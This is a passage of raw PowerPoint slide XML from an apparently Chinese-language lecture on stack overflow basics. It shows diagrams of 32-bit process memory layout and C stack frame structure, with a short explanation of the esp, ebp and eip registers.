                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5E3B76-3F1B-4175-84D3-A144101D1C90}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2365075"/>
                <a:ext cx="1363200" cy="442800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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1D11A9-52EF-40AF-9A40-276A113D8331}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2807875"/>
                <a:ext cx="1363200" cy="603900"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AD4C1CF-9580-4F46-B4E8-C250B4D1C3FF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3411775"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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Heap</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56FD7174-0F20-4CD4-A488-EFB8DC03B573}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3685975"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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Data</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4897EBFA-5D09-43A5-AF46-ED08A85DF867}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3960175"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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Text</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E035F1E-FFA2-4EB8-89D7-B3485CD7DDA3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A19862-8302-4D12-8091-29AEF34B9841}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1761175"/>
                <a:ext cx="0" cy="367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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17BC2F7D-F2F1-415B-B3E6-8BB3C5F20833}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="5579150" y="3077575"/>
                <a:ext cx="0" cy="334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sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362352FB-4C36-4C1D-AC9D-0769DD936331}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="1085100"/>
                <a:ext cx="1047000" cy="274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>
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0xFFFFFFFF</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Shape 637">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46E79958-92A6-475E-99D7-46BBFEB17F57}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="1359300"/>
                <a:ext cx="1047000" cy="274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>
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0xC0000000</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Shape 638">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC41C93-783F-495C-8AA9-C85F673B7FA1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="2674225"/>
                <a:ext cx="1047000" cy="274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>
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0x40000000</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Shape 639">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148B6067-575D-4250-9964-8189ACD8C21C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="4058550"/>
                <a:ext cx="1047000" cy="274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>
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0x08048000</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="21" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C259D00C-3D94-449D-839B-5C6A8EA0329F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="1218750"/>
                <a:ext cx="358500" cy="6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22" name="Shape 641">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7856FE6-9830-4289-A290-D96D0D367EF8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="1492950"/>
                <a:ext cx="358500" cy="6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23" name="Shape 642">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A08A36B3-6B3F-4DF3-A6BA-36578B224A03}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="2807875"/>
                <a:ext cx="358500" cy="6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24" name="Shape 643">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B42A998-DF6E-40B1-8094-91650E959A65}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="4221500"/>
                <a:ext cx="358500" cy="6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25" name="Shape 644">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9E54597-204A-4893-8767-41B285255A4E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="4495700"/>
                <a:ext cx="358500" cy="6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sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Shape 645">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5A299C-3DFC-425A-87A3-2C988083A45C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="4362050"/>
                <a:ext cx="1047000" cy="274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>
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0x00000000</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C8EFC1-AADF-4D52-A09B-1EAE6F2088A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="723948" y="2191435"/>
            <a:ext cx="5372052" cy="3210393"/>
            <a:chOff x="713400" y="1474025"/>
            <a:chExt cx="4283825" cy="2779500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 621">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D61A8D17-35FC-4508-B15B-810E4460C5F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="1474025"/>
              <a:ext cx="2537400" cy="2742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/>
                <a:t>previous stack frame pointer</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 647">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22F69E3D-54E1-46B0-912F-3528263EC322}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="1748225"/>
              <a:ext cx="2537400" cy="572700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D9D9D9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arguments</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 648">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C155EB-71F4-4F63-9BC3-879B2F186BD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2320925"/>
              <a:ext cx="2537400" cy="2742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/>
                <a:t>return address</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B4C9F3D-FBDA-4376-97B2-D7EFD3888AB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2595125"/>
              <a:ext cx="2537400" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect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/>
                <a:t>stack frame pointer</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Shape 649">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{414C51AD-75B3-41CF-A736-4110D8AB7C08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2869325"/>
              <a:ext cx="2537400" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D9EA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/>
                <a:t>callee saved registers</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Shape 650">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020559D6-C4E0-4B01-848E-38DCC0CB1A20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="3143525"/>
              <a:ext cx="2537400" cy="496200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F4CCC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/>
                <a:t>local variables</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Shape 651">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D328E740-EA37-48D4-B4D5-24459C945E81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="3639725"/>
              <a:ext cx="2537400" cy="4962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5" name="Shape 652">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2D93492-FC23-451B-A51F-519052654052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="713400" y="3979325"/>
              <a:ext cx="1083775" cy="274200"/>
              <a:chOff x="4332275" y="4555900"/>
              <a:chExt cx="1083775" cy="274200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Shape 653">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097497BB-187F-4437-8232-CC5C8405C946}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4332275" y="4555900"/>
                <a:ext cx="641400" cy="274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 dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>%esp</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="Shape 654">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23767186-FF7B-4605-A935-90B30057F43C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000" flipH="1">
                <a:off x="4931250" y="4719100"/>
                <a:ext cx="484800" cy="6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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Shape 655">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2849CC3A-BF7D-4F1A-86D0-F40F04A22A43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="713400" y="2732225"/>
              <a:ext cx="641400" cy="27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dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1000" dirty="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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Shape 656">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB22DC12-6E1A-444C-80C0-33A299E8E3CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="1312375" y="2865875"/>
              <a:ext cx="484800" cy="6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38" name="Shape 657">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F30028AE-AC57-46D1-815F-C5D106291539}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355825" y="1482900"/>
              <a:ext cx="641400" cy="2652900"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8333"/>
                <a:gd name="adj2" fmla="val 10163"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF99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" name="文本框 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F43A3F6-30C7-4FC4-97CD-0062A1EBF90D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4678169" y="1238535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栈帧结构概览</a:t>
            </a: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3A0DC31B-8040-4BD5-94DF-D377F36049B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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261921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68FC96DA-737D-438D-8CF8-2C40F33E9360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652529" y="1311499"/>
            <a:ext cx="6096000" cy="5078313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1A1A1A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函数状态主要涉及三个寄存器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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—— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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。，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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依照 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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的存储内容读</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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用来存储函数调用栈的栈顶地址，在压栈和退栈时发生变化。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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用来存储当前函数状态的基地址，在函数运行时不变，可以用来索引确定函数参数或局部变量的位置。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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用来存储即将执行的程序指令的地址取指令并执行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
